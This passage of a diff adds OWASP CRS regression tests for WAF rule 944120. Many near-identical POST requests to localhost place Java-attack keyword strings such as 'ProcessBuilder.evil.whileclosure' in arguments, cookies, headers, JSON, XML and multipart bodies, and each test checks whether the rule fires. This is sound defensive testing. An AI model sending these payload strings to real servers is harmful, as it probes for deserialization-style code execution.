port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-92 + desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-93 + desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-94 + desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-95 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-96 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-97 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-98 + desc: "Content-Type application/json arg name 
includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-99 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-100 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + 
version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-101 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-102 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + 
log_contains: "id \"944120\"" + - test_title: 944120-103 + desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-104 + desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-105 + desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-106 + desc: "Cookie name 
includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeserializationfactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-107 + desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-108 + desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-109 + desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" 
+ port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-110 + desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-111 + desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-112 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-113 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-114 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-115 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + 
method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-116 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-117 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-118 + desc: "Content-Type multipart/form-data XML 
element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-119 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-120 + desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-121 + desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-122 + desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-123 + desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.whileclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-124 + desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-125 + desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-126 + desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-127 + desc: "XML attribute value includes keyword 
ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-128 + desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-129 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-130 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-131 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: | + {"test": "ProcessBuilder.evil.whileclosure"} + output: + log_contains: "id \"944120\"" + - test_title: 944120-132 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: | + {"ProcessBuilder.evil.whileclosure": "test"} + output: + log_contains: "id \"944120\"" + - test_title: 944120-133 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-134 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-135 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + 
ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-136 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml new file mode 100644 index 00000000..b1f4961d --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml 
